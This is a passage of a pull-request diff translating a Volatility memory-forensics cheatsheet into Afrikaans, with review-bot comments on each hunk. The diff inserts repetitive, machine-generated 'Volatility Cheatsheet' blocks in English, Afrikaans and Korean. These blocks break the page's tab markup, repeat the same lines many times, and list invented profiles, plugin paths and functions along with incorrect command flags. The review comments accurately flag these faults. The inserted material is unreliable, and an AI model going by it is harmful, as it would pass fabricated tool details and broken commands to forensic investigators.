you want to use. You can specify additional options to customize the analysis. 
+ +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their associated information, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, including local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles and file names. + +``` +python vol.py -f filescan +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to maximize the effectiveness of your memory analysis. ```bash #Get enabled privileges of some processes volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled 
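Review bot: The GitBook tab structure of the Token privileges section is broken in this hunk: `{% tabs %}` and `{% tab title="vol3" %}` are deleted, and `{% endtab %}` / `{% tab title="vol2" %}` are replaced by an untranslated English "Volatility Cheatsheet" (Introduction, Installation, Basic Usage, Process Analysis, Network Analysis, File Analysis, Conclusion), so the `{% endtab %} {% endtabs %}` that still follows the vol2 `privs` block has no matching open tab and the page will not render. The "Volatility Profiele" list inserted above it is also not a translation and contains profile names that cannot exist: Windows Server 2012, 2016 and 2019 are 64-bit only and have no service packs, so `Win2012SP0x86`, `Win2016SP1x86`, `Win2019SP1x86` and the like are invented. A translation PR should touch prose only; restore the original tab markers and drop the added sections.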
@@ -300,18 +671,129 @@ volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePri ### SIDs -Check each SSID owned by a process.\ -It could be interesting to list the processes using a privileges SID (and the processes using some service SID). - -{% tabs %} -{% tab title="vol3" %} +Kyk na elke SSID wat deur 'n proses besit word.\ +Dit kan interessant wees om die prosesse wat 'n bevoorregte SSID gebruik (en die prosesse wat 'n diens SSID gebruik) te lys. ```bash ./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. 
+- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81SP0x86`: Windows 8.1 SP0 x86 +- `Win81SP0x64`: Windows 8.1 SP0 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## 
Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-directory: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag uit: + +```bash +volatility -f +``` + +Vervang `` met die pad na die geheue-dumplêer en `` met die spesifieke opdrag wat jy wil uitvoer. + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service 
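Review bot: In the SIDs hunk (`@@ -300,18 +671,129 @@`) the vol3/vol2 wrapper is again broken: `{% tabs %}` and `{% tab title="vol3" %}` are removed and `{% endtab %}` / `{% tab title="vol2" %}` are replaced by a whole generated "Volatility Cheatsheet" document, leaving the `{% endtab %} {% endtabs %}` after the vol2 `getsids` block unmatched. The inserted text is padding rather than translation: the same `malfind` line is repeated ten times, `vadtree` and `vadinfo` appear twice in one list, and the installation and usage sections duplicate material already on the page. Keep only the translated sentence ("Kyk na elke SSID ...") and the original markers; while translating, "SSID" was already a typo for "SID" in the English source and could be corrected rather than carried over.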
@@ -319,35 +801,208 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of {% endtab %} {% endtabs %} -### Handles +### Handvatsels -Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened) - -{% tabs %} -{% tab title="vol3" %} +Nuttig om te weet aan watter ander lêers, sleutels, drade, prosesse... 'n **proses 'n handvat** het (geopen het) ```bash vol.py -f file.dmp windows.handles.Handles [--pid ] ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. 
This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their details, such as the local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as the file name, file path, and process ID. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of memory forensics. ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=] ``` -{% endtab %} -{% endtabs %} +{% tab title="vol3" %} ### DLLs {% tabs %} -{% tab title="vol3" %} + +{% tab title="1. DLL 리스트" %} + +- DLL 리스트를 확인하기 위해서는 `dlllist` 명령어를 사용합니다. 
+ +```bash +volatility -f memory_dump.mem --profile=PROFILE dlllist +``` + +{% endtab %} + +{% tab title="2. 특정 DLL 정보" %} + +- 특정 DLL의 정보를 확인하기 위해서는 `dlldump` 명령어를 사용합니다. + +```bash +volatility -f memory_dump.mem --profile=PROFILE dlldump -p PID -D DLL_NAME +``` + +{% endtab %} + +{% tab title="3. DLL 메모리 덤프" %} + +- DLL의 메모리 덤프를 확인하기 위해서는 `memdump` 명령어를 사용합니다. + +```bash +volatility -f memory_dump.mem --profile=PROFILE memdump -p PID -D DLL_NAME -o OFFSET +``` + +{% endtab %} + +{% endtabs %} + +{% endtab %} ```bash ./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory process ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, system compromises, and data breaches. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. 
+ +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To analyze a specific process, use the `psscan` plugin. This plugin scans the memory dump for process structures and displays information about each process, including its name, process ID, and parent process ID. + +``` +python vol.py -f psscan --pid= +``` + +Replace `` with the ID of the process you want to analyze. + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about active network connections, including the local and remote IP addresses, port numbers, and process IDs. + +``` +python vol.py -f netscan +``` + +To analyze network sockets, use the `sockets` plugin. This plugin lists all open network sockets and their associated processes. + +``` +python vol.py -f sockets +``` + +## File Analysis + +To analyze file handles in a memory dump, use the `handles` plugin. This plugin lists all open file handles and their details, such as file name, process ID, and access rights. + +``` +python vol.py -f handles +``` + +To analyze file system artifacts, use the `mftparser` plugin. This plugin parses the Master File Table (MFT) and displays information about files, directories, and other file system objects. + +``` +python vol.py -f mftparser +``` + +## Conclusion + +Volatility is a versatile tool for memory analysis that can help you uncover valuable information from memory dumps. 
This cheatsheet provides a quick reference guide for using Volatility to perform common memory analysis tasks. Experiment with different plugins and options to gain a deeper understanding of the memory dump and the incident you are investigating. + +For more information about Volatility and its capabilities, refer to the official documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dmp #Dump dlls of a proc 
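Review bot: The Handles hunk (`@@ -319,35 +801,208 @@`) removes the closing `{% endtab %} {% endtabs %}` after the vol2 `handles` block and puts a bare `{% tab title="vol3" %}` in its place, then opens the DLLs `{% tabs %}` inside that still-open tab, so the tab sets end up nested and unclosed. The three Korean tabs that follow ("1. DLL 리스트", "2. 특정 DLL 정보", "3. DLL 메모리 덤프") are neither Afrikaans nor part of the source page, and their commands are wrong for Volatility 2: `-D` / `--dump-dir` on `dlldump` and `memdump` takes an output directory, not a `DLL_NAME`, and `dlldump` selects a DLL with `--base` or `--regex`. The English "Volatility Cheatsheet" text is inserted twice more in this hunk, each time in place of `{% endtab %}` / `{% tab title="vol2" %}`. Revert the structural changes and keep only the translated "Handvatsels" sentence.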
@@ -355,19 +1010,75 @@ volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dm {% endtab %} {% endtabs %} -### Strings per processes +### Strings per prosesse -Volatility allows us to check which process a string belongs to. - -{% tabs %} -{% tab title="vol3" %} +Volatility laat ons toe om te kyk tot watter proses 'n string behoort. ```bash strings file.dmp > /tmp/strings.txt ./vol.py -f /tmp/file.dmp windows.strings.Strings --strings-file /tmp/strings.txt ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. 
+- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverirp`: Gee inligting oor die IRP-handlers van bestuurders in die geheue-dump. +- `devicetree`: Gee 'n boomstruktuur van die toestelboom in die geheue-dump. +- `privs`: Lys alle toegangsregte van prosesse in die geheue-dump. +- `envars`: Gee die omgewingsveranderlikes van prosesse in die geheue-dump. +- `cmdscan`: Skandeer die geheue-dump vir moontlike opdraglyne. +- `consoles`: Lys alle konsolvensters in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basis-klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basis-klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basis-klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basis-klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basis-klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basis-klas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle Windows-registernoeë in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n Windows-register sleutel. +- `volatility.plugins.windows.registry.printval.PrintVal`: Druk die waarde van 'n Windows-register sleutel. +- `volatility.plugins.windows.registry.userassist.UserAssist`: Gee inligting oor die UserAssist-sleutel in die Windows-register. +- `volatility.plugins.windows.registry.usbstor.USBStor`: Gee inligting oor USB-stoor toestelle in die Windows-register. +- `volatility.plugins.windows.registry.run.Run`: Gee inligting oor die uitvoering van programme in die Windows-register. 
+- `volatility.plugins.windows.registry.services.Services`: Gee inligting oor dienste in die Windows-register. +- `volatility.plugins.windows.registry.svcscan.SvcScan`: Skandeer die Windows-register vir dienste. +- `volatility.plugins.windows.registry.cmdline.CmdLine`: Gee die opdraglyne van programme in die Windows-register. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Stoor die inhoud van 'n Windows-register in 'n lêer. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash strings file.dmp > /tmp/strings.txt volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt @@ -378,7 +1089,7 @@ strings 3532.dmp > strings_file {% endtab %} {% endtabs %} -It also allows to search for strings inside a process using the yarascan module: +Dit maak dit ook moontlik om te soek na strings binne 'n proses deur die yarascan module te gebruik: {% tabs %} {% tab title="vol3" %} 
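Review bot: The Strings hunk (`@@ -355,19 +1010,75 @@`) replaces `{% endtab %}` / `{% tab title="vol2" %}` with an invented "Volatility Cheat Sheet" whose "Funksies" lists do not match the code base: `volatility.plugins.common` defines `AbstractWindowsCommand`, the Linux and Mac base classes live in `volatility.plugins.linux.common` and `volatility.plugins.mac.common`, and there are no Android, iOS or BSD variants; likewise `printval`, `usbstor`, `run`, `services`, `svcscan`, `cmdline` and `hivedump` are not plugins under the registry package in either Volatility 2 or 3. `malfind` and `apihooks` are also listed under both "Basiese" and "Gevorderde". Keep only the translated sentence "Volatility laat ons toe ..." and the tab markers. Unrelated to the translation but visible in the context: the vol2 line uses `--string-file` while the vol3 command above uses `--strings-file`, which is worth checking rather than carrying forward.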
@@ -386,9 +1097,71 @@ It also allows to search for strings inside a process using the yarascan module: ./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784 ./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://" ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source framework used for memory forensics. It allows analysts to extract valuable information from memory dumps, such as running processes, network connections, and loaded modules. This cheatsheet provides a quick reference guide for using Volatility to analyze memory dumps. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running the following command: + +```bash +pip install volatility +``` + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +```bash +volatility -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can also specify additional options to customize the analysis. + +## Common Plugins + +Here are some commonly used Volatility plugins: + +- `pslist`: Lists all running processes. +- `pstree`: Displays a process tree. +- `netscan`: Shows network connections. +- `modules`: Lists loaded modules. +- `handles`: Lists open handles. +- `dlllist`: Lists loaded DLLs. +- `cmdline`: Displays command-line arguments for processes. +- `filescan`: Scans for file objects in memory. 
+ +## Examples + +Here are some examples of using Volatility: + +- Analyze a memory dump and list all running processes: + +```bash +volatility -f memory.dmp pslist +``` + +- Analyze a memory dump and display a process tree: + +```bash +volatility -f memory.dmp pstree +``` + +- Analyze a memory dump and show network connections: + +```bash +volatility -f memory.dmp netscan +``` + +## Conclusion + +Volatility is a versatile tool for memory forensics. By using its powerful plugins, analysts can extract valuable information from memory dumps. This cheatsheet provides a quick reference guide for using Volatility to analyze memory dumps. ```bash volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784 ``` 
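Review bot: In the yarascan hunk (`@@ -386,9 +1097,71 @@`) the `{% endtab %}` / `{% tab title="vol2" %}` markers are again swapped for an English "Volatility Cheatsheet" (Introduction, Installation, Basic Usage, Common Plugins, Examples, Conclusion), leaving the vol2 `yarascan -Y` block outside any tab and the `{% endtab %} {% endtabs %}` that follows unmatched; the text is not Afrikaans, so it is out of scope for this PR. Its content also conflicts with the rest of the page: the examples such as `volatility -f memory.dmp pslist` omit the `--profile` that every vol2 command here passes, and "Install Python 2.7 or Python 3.x" blurs the distinction the page relies on, since the `volatility` CLI (vol2) is Python 2 only while `vol.py` (vol3) is Python 3. Revert to the original markers.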
@@ -397,16 +1170,140 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3 ### UserAssist -**Windows** keeps track of programs you run using a feature in the registry called **UserAssist keys**. These keys record how many times each program is executed and when it was last run. - -{% tabs %} -{% tab title="vol3" %} +**Windows** hou rekord van programme wat jy uitvoer deur gebruik te maak van 'n funksie in die register genaamd **UserAssist sleutels**. Hierdie sleutels hou by hoeveel keer elke program uitgevoer is en wanneer dit laas uitgevoer is. ```bash ./vol.py -f file.dmp windows.registry.userassist.UserAssist ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump se beeld. +- `kdbgscan`: Skandeer vir die KDBG-handvatsel in die geheue-dump. +- `kpcrscan`: Skandeer vir die KPCR-handvatsel in die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesinligting in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte (VAD). +- `vadtree`: Gee 'n boomstruktuur van alle VAD's in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke VAD. +- `vadwalk`: Loop deur alle VAD's in die geheue-dump en gee inligting oor elkeen. +- `vadtree`: Gee 'n boomstruktuur van alle VAD's in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke VAD. +- `vadwalk`: Loop deur alle VAD's in die geheue-dump en gee inligting oor elkeen. 
+ +### Geheue-analise Opdragte + +- `memmap`: Gee 'n lys van alle geheue-kaarte in die geheue-dump. +- `memdump`: Dump die inhoud van 'n spesifieke geheue-kaart. +- `memstrings`: Soek na ASCII- en Unicode-strings in die geheue-dump. +- `memscan`: Skandeer vir 'n spesifieke waarde in die geheue-dump. +- `memdiff`: Vergelyk twee geheue-dumps en identifiseer verskille. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. + +### Gebruikersruimte Opdragte + +- `cmdscan`: Skandeer vir uitgevoerde opdragte in die geheue-dump. +- `consoles`: Lys alle oop konsole-sessies in die geheue-dump. +- `cmdline`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `getsids`: Gee die sekuriteitsidentifikasienommers (SIDs) vir alle prosesse in die geheue-dump. +- `privs`: Lys die privilegiese van alle prosesse in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. + +### Kernelruimte Opdragte + +- `modules`: Lys alle gelaai kernel modules in die geheue-dump. +- `modscan`: Skandeer vir kernel modules in die geheue-dump. +- `moddump`: Dump die inhoud van 'n spesifieke kernel module. +- `ssdt`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Skandeer vir gelaai kernel drivers in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. 
+ +### Netwerk Opdragte + +- `connections`: Lys alle aktiewe netwerkverbindings in die geheue-dump. +- `sockets`: Lys alle aktiewe sokkels in die geheue-dump. +- `sockscan`: Skandeer vir sokkelinligting in die geheue-dump. +- `netscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. + +### Ander Opdragte + +- `idt`: Gee die Interrupt Descriptor Table (IDT) in die geheue-dump. +- `gdt`: Gee die Global Descriptor Table (GDT) in die geheue-dump. +- `dt`: Gee die Descriptor Table (DT) in die geheue-dump. +- `ssdt`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common: list_tasks()`: Gee 'n lys van alle aktiewe prosesse in die geheue-dump. +- `volatility.plugins.common: list_modules()`: Gee 'n lys van alle gelaai DLL's in die geheue-dump. +- `volatility.plugins.common: list_handles()`: Gee 'n lys van alle handvatsels in die geheue-dump. +- `volatility.plugins.common: list_drivers()`: Gee 'n lys van alle gelaai kernel drivers in die geheue-dump. +- `volatility.plugins.common: list_connections()`: Gee 'n lys van alle aktiewe netwerkverbindings in die geheue-dump. + +### Geheue-analise Funksies + +- `volatility.plugins.memmap: get_memmap()`: Gee 'n lys van alle geheue-kaarte in die geheue-dump. +- `volatility.plugins.memdump: dump_mem()`: Dump die inhoud van 'n spesifieke geheue-kaart. +- `volatility.plugins.memstrings: search_mem()`: Soek na ASCII- en Unicode-strings in die geheue-dump. 
+- `volatility.plugins.memscan: scan_mem()`: Skandeer vir 'n spesifieke waarde in die geheue-dump. +- `volatility.plugins.memdiff: diff_mem()`: Vergelyk twee geheue-dumps en identifiseer verskille. +- `volatility.plugins.malfind: find_malware()`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. + +### Gebruikersruimte Funksies + +- `volatility.plugins.cmdscan: scan_cmd()`: Skandeer vir uitgevoerde opdragte in die geheue-dump. +- `volatility.plugins.consoles: list_consoles()`: Lys alle oop konsole-sessies in die geheue-dump. +- `volatility.plugins.cmdline: get_cmdline()`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `volatility.plugins.envars: list_envars()`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `volatility.plugins.getsids: get_sids()`: Gee die sekuriteitsidentifikasienommers (SIDs) vir alle prosesse in die geheue-dump. +- `volatility.plugins.privs: list_privs()`: Lys die privilegiese van alle prosesse in die geheue-dump. +- `volatility.plugins.printkey: print_key()`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. + +### Kernelruimte Funksies + +- `volatility.plugins.modules: list_modules()`: Lys alle gelaai kernel modules in die geheue-dump. +- `volatility.plugins.modscan: scan_modules()`: Skandeer vir kernel modules in die geheue-dump. +- `volatility.plugins.moddump: dump_module()`: Dump die inhoud van 'n spesifieke kernel module. +- `volatility.plugins.ssdt: get_ssdt()`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `volatility.plugins.driverscan: scan_drivers()`: Skandeer vir gelaai kernel drivers in die geheue-dump. +- `volatility.plugins.driverirp: get_irp()`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. + +### Netwerk Funksies + +- `volatility.plugins.connections: list_connections()`: Lys alle aktiewe netwerkverbindings in die geheue-dump. 
